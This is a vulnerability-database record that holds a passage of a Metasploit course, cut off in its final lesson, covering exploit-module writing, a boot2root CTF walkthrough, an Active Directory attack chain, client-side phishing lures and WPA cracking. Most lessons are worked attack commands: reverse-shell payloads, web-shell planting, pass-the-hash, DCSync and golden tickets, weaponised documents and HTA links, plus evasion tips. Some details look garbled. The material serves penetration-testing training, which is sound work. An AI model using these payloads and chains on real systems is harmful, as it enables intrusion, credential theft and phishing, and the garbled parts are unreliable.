{"uuid": "a264d72b-0bc2-4dc5-b3df-151451e88804", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/riskiidice/d7687b881b245df5bc96147fc1e6b01c", "content": "# Module 6: Real-World Exploitation & CTF Scenarios\n\n---\n\n## Lesson 26: Exploit Development with MSF (CVE-Focused)\n\n### Learning Objectives\n- Understand the MSF exploit module structure as a foundation for exploit development\n- Use `searchsploit` to find public exploits and convert them to MSF format\n- Analyze CVE details and map them to MSF modules\n- Write a basic MSF exploit module from scratch\n- Understand egghunters, SEH overwrites, and ROP chains\n\n---\n\n### Theory/Explanation\n\n#### Anatomy of an MSF Exploit Module\n\nEvery MSF exploit module is a Ruby class inheriting from an MSF exploit mixin:\n\n```ruby\n# modules/exploits/windows/smb/custom_cve.rb\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking # or GreatRanking, ExcellentRanking, etc.\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Custom CVE-2024-XXXX SMB Exploit',\n 'Description' => %q{\n This module exploits CVE-XXXX-XXXX in the SMB protocol.\n A remote code execution vulnerability exists due to\n improper handling of specially crafted SMB packets.\n },\n 'Author' => ['Your Name '],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2024-XXXX'],\n ['URL', 'https://example.com/advisory'],\n ['EDB', '12345']\n ],\n 'Platform' => ['win'],\n 'Arch' => [ARCH_X64],\n 'Targets' =>\n [\n ['Windows Server 2019', {\n 'Payload' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 445\n }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2024-01-15'\n ))\n\n register_options([\n Opt::RHOST(),\n Opt::RPORT(445),\n OptString.new('NAME', [true, 'SMB share name', 'C$'])\n ])\n end\n\n def exploit\n print_status(\"Connecting to target...\")\n connect\n print_status(\"Sending malicious payload...\")\n sock.put(payload.encoded)\n handler\n ensure\n disconnect\n end\nend\n```\n\n#### Exploit Ranking System\n\nMSF assigns ranks to modules based on reliability:\n\n| Rank | Meaning |\n|------|---------|\n| `ManualRanking` | Don't use automatically |\n| `LowRanking` | Unreliable, may crash |\n| `AverageRanking` | Normal, may crash sometimes |\n| `NormalRanking` | Standard exploit |\n| `GoodRanking` | Reliable, works consistently |\n| `GreatRanking` | Very reliable, has auto-targeting |\n| `ExcellentRanking` | Best, won't crash, auto-detects |\n\n#### Using searchsploit\n\n```bash\n# Search for exploits\nsearchsploit smb 8.1\nsearchsploit -t windows smb ms17\nsearchsploit CVE-2024-1234\n\n# Show full path\nsearchsploit -p 50644\n\n# Copy exploit to working directory\nsearchsploit -m 50644 # mirror (copy)\n\n# Update exploit database\nsearchsploit -u\n```\n\n#### Writing a Simple Buffer Overflow MSF Module\n\n```ruby\n# modules/exploits/windows/custom/bof.rb\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Custom Buffer Overflow',\n 'Description' => %q{\n Stack-based buffer overflow in vulnerable service.\n Sending 2000 bytes overwrites EIP.\n },\n 'Author' => ['Attacker'],\n 'References' => [['EDB', '12345']],\n 'Platform' => ['win'],\n 'Arch' => [ARCH_X86],\n 'Targets' =>\n [\n ['Windows XP SP3', {\n 'Payload' => 'windows/meterpreter/reverse_tcp',\n 'Offset' => 2000,\n 'Ret' => 0x41414141 # JMP ESP address\n }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2024-01-01'\n ))\n\n register_options([\n Opt::RHOST(),\n Opt::RPORT(9999)\n ])\n end\n\n def exploit\n connect\n\n # Build overflow buffer\n buffer = rand_text(target['Offset'])\n buffer += [target['Ret']].pack('V') # overwrite EIP with JMP ESP\n buffer += make_nops(16)\n buffer += payload.encoded\n\n print_status(\"Sending #{buffer.length} byte buffer...\")\n sock.put(buffer)\n\n handler\n disconnect\n end\nend\n```\n\n#### Egghunter Shellcode\n\nWhen you have limited space for shellcode, use an egghunter \u2014 a small (~60 byte) stub that searches memory for your full payload (marked with a tag):\n\n```bash\n# Generate egghunter shellcode\nmsfvenom -p linux/x64/egghunter LHOST=10.0.0.5 LPORT=4444 -f c\n\n# Use in your exploit: first stage is egghunter (small)\n# Second stage is your full payload tagged with \"w00tw00t\"\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -b '\\x00' -f c\n# Tag the payload: prepend \"w00tw00t\" to it\n```\n\n---\n\n### Exercise 26.1\n\n**Task**:\n\n1. Use `searchsploit` to find exploits related to `samba` and ` EternalBlue`\n2. Identify a specific EDB-ID exploit and mirror it to `/tmp/exploits/`\n3. Analyze the mirrored exploit to identify: target platform, required options, and payload type\n4. Create a minimal MSF module skeleton for a fictional CVE in `/tmp/exploits/custom_module.rb`\n5. Show how to load the custom module in msfconsole\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Search for Samba exploits\nsearchsploit samba | head -20\n# Results:\n# EDB-ID Title\n# 42030 Samba 3.5.0 - Lock Denial of Service\n# 33598 Samba 3.6.4 - Pool Memory Exhaustion\n# 42015 Samba 4.6.4 Remote Code Execution\n\nsearchsploit EternalBlue\n# EDB-ID: 42030 (depends on version)\n\n# 2. Mirror the exploit\nmkdir -p /tmp/exploits\nsearchsploit -m 42015\n# Copies: /usr/share/exploitdb/exploits/linux/remote/42015.rb -> /tmp/exploits/\n\n# 3. Analyze the exploit\nhead -100 /tmp/exploits/42015.rb\n# Shows:\n# - Target: Samba 4.6.4\n# - Platform: linux\n# - Arch: x86/x64\n# - Payload: 'linux/x86/meterpreter/reverse_tcp' or similar\n# - Required: RHOST, RPORT (445), SMB versions\n\n# 4. Create custom module skeleton\ncat > /tmp/exploits/custom_module.rb << 'EOF'\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Custom Application CVE-2024-0001 RCE',\n 'Description' => %q{\n This module exploits CVE-2024-0001 in CustomApp v1.0.\n A remote code execution vulnerability exists due to\n improper input validation in the authentication handler.\n },\n 'Author' => ['Attacker '],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2024-0001'],\n ['URL', 'https://example.com/advisory']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X64],\n 'Targets' =>\n [\n ['CustomApp 1.0', {\n 'Payload' => 'linux/x64/meterpreter/reverse_tcp',\n 'RPORT' => 8080\n }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2024-01-15'\n ))\n\n register_options([\n Opt::RHOST(),\n Opt::RPORT(8080)\n ])\n end\n\n def exploit\n connect\n print_status(\"Sending exploit...\")\n sock.put(payload.encoded)\n handler\n ensure\n disconnect\n end\nend\nEOF\n\n# 5. Load custom module in msfconsole\n# Option A: Copy to MSF module directory\ncp /tmp/exploits/custom_module.rb /usr/share/metasploit-framework/modules/exploits/custom/\nmsfconsole -q\nmsf6 > use exploit/custom/custom_module\n\n# Option B: Use loadpath\nmsfconsole -q\nmsf6 > loadpath /tmp/exploits\nmsf6 > use exploit/custom/custom_module\n```\n\n\n\n---\n\n## Lesson 27: CTF Walkthrough \u2014 Boot2Root with MSF\n\n### Learning Objectives\n- Apply MSF systematically in a CTF boot2root challenge\n- Combine port scanning, vulnerability identification, and exploitation\n- Use Meterpreter for privilege escalation\n- Capture the flags (flag.txt) at each stage\n- Document methodology for writeups\n\n---\n\n### Theory/Explanation\n\n#### CTF Methodology with MSF\n\n```\nPhase 1: Reconnaissance\n - db_nmap -sV -sC -oA scan\n - Import into MSF database\n - Analyze services\n\nPhase 2: Vulnerability Discovery\n - searchsploit on discovered services\n - Use MSF auxiliary scanners\n - Manual inspection\n\nPhase 3: Exploitation\n - Select and configure MSF exploit\n - Generate appropriate payload\n - Establish session\n\nPhase 4: Post-Exploitation\n - Enumerate filesystem\n - Find user.txt (user flag)\n - Enumerate for privilege escalation vector\n\nPhase 5: Privilege Escalation\n - Exploit kernel/system misconfiguration\n - Get root.txt (root flag)\n```\n\n#### Example CTF Scenario: \"VulnNet\"\n\n```bash\n# Phase 1: Network scan\nmsfconsole -q\nmsf6 > db_nmap -sV -sC -p- 192.168.56.100 -oA /tmp/vulnnet_scan\n\n# Import results\nmsf6 > hosts\nHost OS Purpose\n192.168.56.100 Linux Web server, SSH\n\nmsf6 > services\nPORT STATE SERVICE VERSION\n22 open ssh OpenSSH 7.4\n80 open http Apache 2.4.6\n3306 open mysql MySQL 5.5.60\n\n# Phase 2: Web enumeration\nmsf6 > use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.56.100\nmsf6 auxiliary(scanner/http/dir_scanner) > run\n# Found: /admin (redirects to login)\n# Found: /phpmyadmin (database admin)\n\n# Phase 3: Exploitation\n# Try default MySQL credentials\nmsf6 > use auxiliary/scanner/mysql/mysql_login\nmsf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.56.100\nmsf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root\nmsf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt\nmsf6 auxiliary(scanner/mysql/mysql_login) > run\n# Result: root:root123\n\n# Phase 4: Get user flag via web shell\n# Since we have MySQL access, try into/outfile to write web shell\nmsf6 > use auxiliary/admin/mysql/mysql_sql\nmsf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 192.168.56.100\nmsf6 auxiliary(admin/mysql/mysql_sql) > set SQL \"SELECT '' INTO OUTFILE '/var/www/html/shell.php'\"\nmsf6 auxiliary(admin/mysql/mysql_sql) > run\n\n# Now access web shell\ncurl http://192.168.56.100/shell.php?cmd=whoami\n# www-data\n\n# Get meterpreter by generating a PHP payload\nmsfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f raw > /tmp/shell.php\n# Upload via the web shell and access it\n\n# Phase 5: Privilege escalation\nmeterpreter > shell\n$ python3 -c 'import os; os.system(\"/bin/bash\")'\n$ cd /home\n$ ls\nvictim\n$ cat /home/victim/user.txt\nFLAG{user_flag_here}\n\n# Find privilege escalation vector\n$ sudo -l\nUser www-data may run the following commands:\n (ALL) NOPASSWD: /usr/bin/python3\n\n$ sudo python3 -c 'import os; os.system(\"/bin/bash\")'\n# root shell\n# cat /root/root.txt\nFLAG{root_flag_here}\n```\n\n---\n\n### Exercise 27.1\n\n**Task**: Walk through a complete CTF scenario (use your own lab VM or practice box):\n\n1. Run a comprehensive nmap scan via MSF db_nmap\n2. Import the scan results and list all hosts/services\n3. Use `searchsploit` on discovered services\n4. Exploit a vulnerability to get a shell\n5. Get the user flag\n6. Enumerate for privilege escalation\n7. Escalate to root and get the root flag\n8. Export the session log for a writeup\n\n```bash\n# TODO: Execute all steps on your practice VM\n```\n\n\n\nSolution\n\n```bash\n# Setup: Assuming target IP is 192.168.56.101\n# (This exercise is meant to be done on your own lab VM)\n\n# 1. Comprehensive scan\nmsfconsole -q\nmsf6 > db_nmap -sV -sC -A -p- -oA /tmp/ctf_scan 192.168.56.101\n\n# 2. Import and list\nmsf6 > hosts\nmsf6 > services\n# Results show:\n# PORT STATE SERVICE VERSION\n# 21 open ftp vsFTPd 3.0.3\n# 22 open ssh OpenSSH 7.4 (protocol 2.0)\n# 80 open http Apache 2.4.6 (PHP 7.0.33)\n# 3306 open mysql MariaDB 5.5.60\n\n# 3. Searchsploit\nsearchsploit vsftpd 3.0.3\n# EDB: 49759 - vsftpd 3.0.3 - Denial of Service (doesn't give shell)\n\nsearchsploit OpenSSH 7.4\n# No critical RCE for 7.4\n\nsearchsploit Apache 2.4.6\n# Find: Apache 2.4.6 - PHP 7.0.33 has exploit (CVE-2018-xxxx for example)\n\n# 4. Exploit\nmsf6 > use exploit/unix/webapp/phpmyadmin_lfi_rce\n# (Use whatever exploit matches your target)\n\n# 5. Get user flag\nmeterpreter > shell\n$ find / -name \"user.txt\" 2>/dev/null\n/home/ubuntu/user.txt\n$ cat /home/ubuntu/user.txt\nFLAG{ctf_user_flag_abc123}\n\n# 6. Enumerate for privesc\n$ sudo -l\n(ubuntu) NOPASSWD: /bin/bash\n\n# Actually check for privesc via enumeration script\nmeterpreter > upload /tmp/linpeas.sh /tmp/linpeas.sh\nmeterpreter > shell\n$ chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh\n\n# 7. Escalate\n$ sudo /bin/bash\n# root shell\n$ cat /root/root.txt\nFLAG{ctf_root_flag_xyz789}\n\n# 8. Export session log\nmsf6 > makerc /tmp/ctf_session.rc\n# Now you have a script to replay the entire session\n```\n\n\n\n---\n\n## Lesson 28: Active Directory Attack Chain\n\n### Learning Objectives\n- Build a complete AD attack chain using MSF modules\n- Perform recon: enum users, groups, trusts, shares\n- Exploit Printer Bug for privilege escalation\n- Use SMB relay attacks\n- Understand the relationship between AD attacks and MSF\n\n---\n\n### Theory/Explanation\n\n#### AD Attack Chain Overview\n\n```\nInitial Access \u2192 Recon \u2192 Privilege Escalation \u2192 Persistence \u2192 Lateral Movement \u2192 Domain Dominance\n | | | | | |\n Phishing BloodHound Kerberoast Golden WMI DCSync\n enum ~SPN accounts Ticket PsExec krbtgt\n LDAP enum Registry WinRM Domain\n persistence SMB relay controllers\n```\n\n#### Phase 1: Initial Recon\n\n```bash\n# Use MSF's LDAP module for AD enumeration\nmsf6 > use auxiliary/admin/ldap/query\nset RHOSTS DC01.corp.local\nset BASE_DN \"DC=corp,DC=local\"\nset USERNAME CORP\\\\lowprivuser\nset PASSWORD Password123\nset FILTER \"(objectClass=user)\"\nrun\n\n# Use PowerView from meterpreter (if you have a session on domain-joined host)\nmeterpreter > load powershell\nmeterpreter > powershell_import /usr/share/powersploit/Recon/PowerView.ps1\nmeterpreter > powershell_execute \"Get-NetDomain\"\nmeterpreter > powershell_execute \"Get-NetDomainControllers\"\nmeterpreter > powershell_execute \"Get-NetUser | Select-Object -First 30\"\n```\n\n#### Phase 2: Kerberoasting\n\n```bash\n# Find users with SPN (service accounts)\nmeterpreter > powershell_execute \"Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\"\n\n# Request TGS for each SPN\n# Use from meterpreter:\nmeterpreter > run post/windows/gather/credentials/kerberos_tickets\n\n# Or use from msfconsole:\nmsf6 > use auxiliary/admin/kerberos/kerberos_ticket_export\nset SESSION 1\nrun\n\n# Crack the TGS offline\nhashcat -m 13100 -a 0 tickets.kirbi /usr/share/wordlists/rockyou.txt\n```\n\n#### Phase 3: SMB Relay Attack\n\n```bash\n# Start SMB relay module\nmsf6 > use auxiliary/server/capture/smb\nset SRVHOST 10.0.0.5\nset SRVPORT 445\nrun -j\n\n# Or use Responder (external tool) to poison LLMNR/NBT-NS\n# This forces targets to authenticate to your relay\n```\n\n#### Phase 4: Pass-the-Hash (from LDAP)\n\n```bash\n# With domain admin hash:\nmsf6 > use exploit/windows/smb/psexec\nset RHOSTS 192.168.1.10\nset SMBUser Administrator\nset SMBPass \nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nset LHOST 10.0.0.5\nexploit\n\n# Lateral movement via WMI\nmsf6 > use exploit/windows/smb/wmiexec\nset RHOSTS 192.168.1.20\nset SMBUser Administrator\nset SMBPass \nexploit\n```\n\n#### Phase 5: Domain Dominance with DCSync\n\n```bash\n# Once you have Domain Admin access:\nmeterpreter > load kiwi\nmeterpreter > dcsync_ntlm CORP.LOCAL\\\\krbtgt\n\n# Create golden ticket\nmeterpreter > golden_ticket_create -d CORP.LOCAL -k -s -u Administrator\n\n# Now you have full domain persistence\n```\n\n---\n\n### Exercise 28.1\n\n**Task**: Build an AD attack chain on a practice domain (simulated):\n\n1. Enumerate domain users via LDAP module\n2. Find SPN accounts (Kerberoastable targets)\n3. Extract password hashes via hashdump\n4. Use Pass-the-Hash to lateral move to another host\n5. Get Domain Admin via DCSync\n6. Create a golden ticket\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. LDAP enumeration\nmsf6 > use auxiliary/admin/ldap/query\nmsf6 auxiliary(admin/ldap/query) > set RHOSTS DC01.corp.local\nmsf6 auxiliary(admin/ldap/query) > set BASE_DN \"DC=corp,DC=local\"\nmsf6 auxiliary(admin/ldap/query) > set USERNAME CORP\\\\pentester\nmsf6 auxiliary(admin/ldap/query) > set PASSWORD P@ssw0rd123\nmsf6 auxiliary(admin/ldap/query) > set FILTER \"(objectClass=user)\"\nmsf6 auxiliary(admin/ldap/query) > run\n\n# Output: Lists all domain users with their SPNs\n\n# 2. Find SPN accounts\n# From meterpreter on domain-joined host:\nmeterpreter > powershell_execute \"Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\"\n\n# Output:\n# samaccountname serviceprincipalname\n# svc_sql MSSQLSvc/sql01.corp.local\n# svc_backup MSSQLSvc/sql02.corp.local\n\n# 3. Hashdump on DC or any domain admin accessible host\nmeterpreter > hashdump\n# OR from msfconsole with DA access:\nmsf6 > run post/windows/gather/hashdump\n# Output: All domain hashes\n\n# 4. Pass-the-Hash lateral movement\nmsf6 > use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.20 # second DC\nmsf6 exploit(windows/smb/psexec) > set SMBUser Administrator\nmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99\nmsf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) > exploit\n\n# 5. DCSync with Domain Admin\nmeterpreter > load kiwi\nmeterpreter > dcsync_ntlm CORP.LOCAL\\\\krbtgt\n# Extracts krbtgt hash and domain SID\n\n# 6. Golden ticket\nmeterpreter > golden_ticket_create -d CORP.LOCAL \\\n -k \\\n -s \\\n -u Administrator \\\n -t /tmp/golden_ticket.kirbi\n\n# Verify with:\nmeterpreter > kerberos_ticket_use /tmp/golden_ticket.kirbi\n```\n\n\n\n---\n\n## Lesson 29: Social Engineering & Client-Side Attacks\n\n### Learning Objectives\n- Use MSF's client-side attack modules\n- Generate malicious documents (DOC, PDF) with embedded payloads\n- Set up an SMB relay for credential harvesting\n- Use the `browser_autocomplete` and `browser_jwe` modules\n- Understand client-side attack methodology\n\n---\n\n### Theory/Explanation\n\n#### Client-Side Attack Philosophy\n\nInstead of attacking a server directly, you attack the CLIENT (the user's workstation). You make the user connect to your malicious server or open a malicious file. When they do, you get code execution on their machine.\n\n**Common scenarios:**\n- Malicious link sent via email \u2192 user opens in browser \u2192 meterpreter\n- Malicious PDF via email \u2192 user opens \u2192 meterpreter\n- Malicious DOC via email \u2192 user enables macros \u2192 meterpreter\n- Rogue SMB server \u2192 user accesses shared folder \u2192 hash capture\n\n#### Malicious Document Generation\n\n```bash\n# Generate malicious RTF document\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f rtf \\\n -o malicious.rtf\n\n# Generate malicious PDF\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f pdf \\\n -o malicious.pdf\n\n# Generate malicious DOCX (VBA macro)\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f docx \\\n -o malicious.docx\n\n# Generate macro-enabled XLS\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f psh VBA \\\n -o macro.vba\n# Then embed in Excel via manual process\n```\n\n#### The `msfconsole` HTA Attack\n\n```bash\n# Host an HTA exploit via msfconsole\nmsf6 > use exploit/windows/misc/hta_server\nmsf6 exploit(windows/misc/hta_server) > set SRVHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/misc/hta_server) > set LHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) > exploit -j\n# Generates: http://10.0.0.5:8080/abc123.hta\n\n# Send this link to target user\n# When they open it in IE/Edge, meterpreter fires\n```\n\n#### SMB Relay Attack\n\n```bash\n# Use Responder + MSF SMB relay\n# 1. Start Responder to poison LLMNR/NBT-NS\nresponder -I eth0 -b On\n\n# 2. When a user tries to access a share and fails,\n# responder captures their NTLM hash\n\n# 3. Relay captured hash to another target\nmsf6 > use auxiliary/server/relay_local\n# This relays hashes to targets you specify\n```\n\n#### Browser Exploitation\n\n```bash\n# Use browser_autopwn (automatic browser exploitation)\nmsf6 > use auxiliary/server/browser_autopwn\nmsf6 auxiliary(server/browser_autopwn) > set SRVHOST 10.0.0.5\nmsf6 auxiliary(server/browser_autopwn) > set URIPATH /\nmsf6 auxiliary(server/browser_autopwn) > run -j\n# Generates multiple exploit URLs for different browsers\n# When target visits, auto-exploits with best available exploit\n```\n\n---\n\n### Exercise 29.1\n\n**Task**:\n\n1. Set up an HTA server exploit in msfconsole\n2. Generate a malicious RTF document for Word\n3. Generate a macro-enabled VBA script\n4. Set up a browser_autopwn server\n5. For each: explain the attack flow and what the user needs to do\n\n```bash\n# TODO: Execute and explain\n```\n\n\n\nSolution\n\n```bash\n# 1. HTA Server (most reliable client-side)\nmsf6 > use exploit/windows/misc/hta_server\nmsf6 exploit(windows/misc/hta_server) > set SRVHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/misc/hta_server) > set LHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) > exploit -j\n[*] URL: http://10.0.0.5:8080/PNgfvJhP.hta\n\n# Attack flow:\n# 1. Attacker sends link: http://10.0.0.5:8080/PNgfvJhP.hta\n# 2. User opens link in IE/Edge\n# 3. HTA file downloads and executes (with user confirmation)\n# 4. Meterpreter fires \u2014 no macro needed, no file to open\n\n# 2. Malicious RTF\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f rtf \\\n -o malicious.rtf\n\n# Attack flow:\n# 1. Attacker sends RTF via email\n# 2. User opens RTF in Word\n# 3. RTF exploits CVE-XXXX (old Word vulnerability)\n# 4. Meterpreter fires\n\n# 3. Macro VBA\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n LHOST=10.0.0.5 LPORT=4444 \\\n -f psh VBA \\\n -o macro.vba\n\n# Attack flow:\n# 1. Attacker sends DOCM with macro.vba embedded\n# 2. User opens document, sees \"Enable Content\" prompt\n# 3. User clicks Enable Content\n# 4. Macro executes: downloads meterpreter and runs it\n# 5. Meterpreter fires\n\n# 4. Browser Autopwn\nmsf6 > use auxiliary/server/browser_autopwn\nmsf6 auxiliary(server/browser_autopwn) > set SRVHOST 10.0.0.5\nmsf6 auxiliary(server/browser_autopwn) > set URIPATH /\nmsf6 auxiliary(server/browser_autopwn) > run -j\n[*] Starting exploit generator...\n[*] Browsers supported: [mshtml, chromefox, firefox]\n[*] URL: http://10.0.0.5:8080/\n\n# Attack flow:\n# 1. Attacker sends link: http://10.0.0.5:8080/\n# 2. User opens link in any browser\n# 3. Autopwn tests each browser and exploits the best available\n# 4. Meterpreter fires on first successful exploit\n```\n\n\n\n---\n\n## Lesson 30: Wireless Attacks & Radio Frequency Exploitation\n\n### Learning Objectives\n- Use `aircrack-ng` suite for wireless reconnaissance\n- Use `hostapd-wpe` for WPA enterprise attacks\n- Understand the MSF wireless modules\n- Perform wireless network enumeration\n- Capture and crack WPA handshakes\n\n---\n\n### Theory/Explanation\n\n#### MSF Wireless Modules\n\nMSF has limited wireless capabilities \u2014 primarily for reporting and data management:\n\n```bash\n# These modules primarily manage data from wireless reconnaissance\n# not active wireless attacks\n\n# Import and manage wireless data\nmsf6 > use auxiliary/client/socket/reverse_tcp\n# This is not wireless-specific\n\n# The primary wireless attack tools are external:\n# - aircrack-ng suite\n# - hostapd-wpe\n# - wifite2\n# - hcxdumptool\n```\n\n#### Wireless Recon with aircrack-ng\n\n```bash\n# Put interface in monitor mode\nairmon-ng start wlan0\n# Creates: wlan0mon\n\n# Capture traffic\nairodump-ng wlan0mon -w /tmp/capture --output-format pcap\n\n# Target a specific network\nairodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF \\\n -c 6 \\\n --essid CorpWiFi \\\n -w /tmp/corp_wifi\n\n# Deauth to force reconnection (grab handshake)\naireplay-ng wlan0mon -0 5 -a AA:BB:CC:DD:EE:FF -c TARGET_CLIENT\n\n# Crack WPA handshake\naircrack-ng -w /usr/share/wordlists/rockyou.txt \\\n -b AA:BB:CC:DD:EE:FF /tmp/corp_wifi.cap\n```\n\n#### WPA Enterprise Attacks\n\n```bash\n# Set up rogue AP with hostapd-wpe\nhostapd-wpe /etc/hostapd-wpe.conf\n\n# Configuration example:\n# interface=wlan0mon\n# ssid=CorpWiFi\n# driver=nl80211\n# ieee8021x=1\n# eap_server=1\n# eap_user_file=/etc/hostapd-wpe.eap_user\n# Credentials captured when user connects to your fake AP\n```\n\n#### MSF Integration with Wireless\n\n```bash\n# After capturing handshake, import into MSF for management\n# MSF doesn't crack WPA \u2014 use hashcat or aircrack-ng\n\n# Store wireless data in MSF database\n# (after using airodump-xml2sql or similar import)\n\n# Use MSFCREDENTIAL to store cracked passwords\nmsf6 > creds add user:admin hash:5f4dcc3b5aa765d61d8327deb882cf99\n```\n\n---\n\n### Exercise 30.1\n\n**Task**:\n\n1. List all wireless interfaces and put one in monitor mode\n2. Run airodump-ng to discover nearby networks\n3. Target a specific network and capture a handshake\n4. Crack the handshake using hashcat\n5. Store the cracked credentials in the MSF database\n\n```bash\n# TODO: Execute wireless attack steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Monitor mode\niwconfig # list interfaces\nairmon-ng start wlan0\n# or: ip link set wlan0 down && iw dev wlan0 set monitor mode && ip link set wlan0 up\n\n# 2. Discover networks\nairodump-ng wlan0mon\n# Output:\n# CH 6 SSID BSSID ENCRYPTION AUTH\n# 6 CorpWiFi AA:BB:CC:DD:EE:FF WPA2 PSK\n# 6 GuestWiFi 11:22:33:44:55:66 WPA2 PSK\n\n# 3. Target and capture handshake\nairodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/corp --output-format pcap\n\n# In another terminal, deauth to force reconnection:\naireplay-ng wlan0mon -0 5 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA\n\n# Wait for handshake in airodump output:\n# [WPA handshake: AA:BB:CC:DD:EE:FF]\n\n# 4. Crack with hashcat\n# Convert to hccapx format\n# Using hashcat tools:\n# ./cap2hccapx.bin /tmp/corp-01.cap /tmp/corp.hccapx\n\n# Crack:\nhashcat -m 2500 -a 0 /tmp/corp.hccapx /usr/share/wordlists/rockyou.txt\n\n# 5. Store in MSF database\nmsf6 > creds add user:admin host:192.168.1.50 service:wifi \\\n password:SuperSecret123 \\\n 'cracked_password:SuperSecret123'\n```\n\n\n\n---\n\n# Module 7: Red Team Operations with Metasploit\n\n---\n\n## Lesson 31: Red Team vs Penetration Testing\n\n### Learning Objectives\n- Understand the difference between penetration testing and red team operations\n- Plan a red team engagement: scope, objectives, rules of engagement\n- Use C2 frameworks alongside MSF for advanced operations\n- Understand operational security (OPSEC) during engagements\n- Coordinate red team with blue team (threat emulation)\n\n---\n\n### Theory/Explanation\n\n#### Penetration Testing vs Red Team\n\n| Aspect | Penetration Test | Red Team |\n|--------|-----------------|----------|\n| **Goal** | Find vulnerabilities | Achieve objectives (data breach, domain dominance) |\n| **Scope** | Specific systems/networks | Full organization (physical, social, technical) |\n| **Duration** | Days to weeks | Weeks to months |\n| **Phases** | Quick, thorough scanning | Slow, stealthy, persistent |\n| **Success** | Findings count | Objective achieved |\n| **Stealth** | Moderate | Critical |\n\n#### Red Team Engagement Planning\n\n```bash\n# Rules of Engagement Document\n# ============================\n# Scope: All corporate systems at 192.168.1.0/24 and 10.10.10.0/24\n# Objectives:\n# 1. Obtain Domain Admin\n# 2. Access financial systems\n# 3. Exfiltrate sample data (simulated)\n# Rules:\n# - No denial of service\n# - No physical access\n# - Weekly status reports\n# - Immediate notification of DBAN access\n# - Engagement duration: 30 days\n```\n\n#### C2 Frameworks\n\nC2 (Command and Control) frameworks extend MSF capabilities for long-term operations:\n\n| Framework | Language | Notes |\n|-----------|---------|-------|\n| **Covenant** | C# (.NET) | Cross-platform, pivoting, rich UI |\n| **Cobalt Strike** | Java | Commercial, best-in-class, Beacon payload |\n| **Sliver** | Go | Open-source, cross-platform, advanced EDR evasion |\n| **Mythic** | Python | Modern, containerized, browser scriptable |\n| **Koadic** | Python | JScript/VBS COM-based, Windows focus |\n\n#### OPSEC Principles\n\nOperational Security (OPSEC) keeps your operation undetected:\n\n```\nOPSEC Rules for Red Team:\n========================\n1. Callbacks to same IP/port = pattern\n Fix: Rotate LHOST, use domain fronting, CDN redirects\n\n2. Repeated exploitation = detection\n Fix: Use legitimate credentials, living-off-the-land (LotL)\n\n3. Large payloads in memory = AV triggering\n Fix: Small stagers, AMSI bypass, segmented execution\n\n4. Scheduled callbacks = network anomaly\n Fix: Randomize intervals, use domain-relative timing\n\n5. Standard payload paths = file-based detection\n Fix: In-memory execution, Schrang (process hollowing)\n```\n\n#### MSF in Red Team Engagements\n\n```bash\n# MSF is typically used for:\n# 1. Initial access (when C2 is not yet deployed)\n# 2. 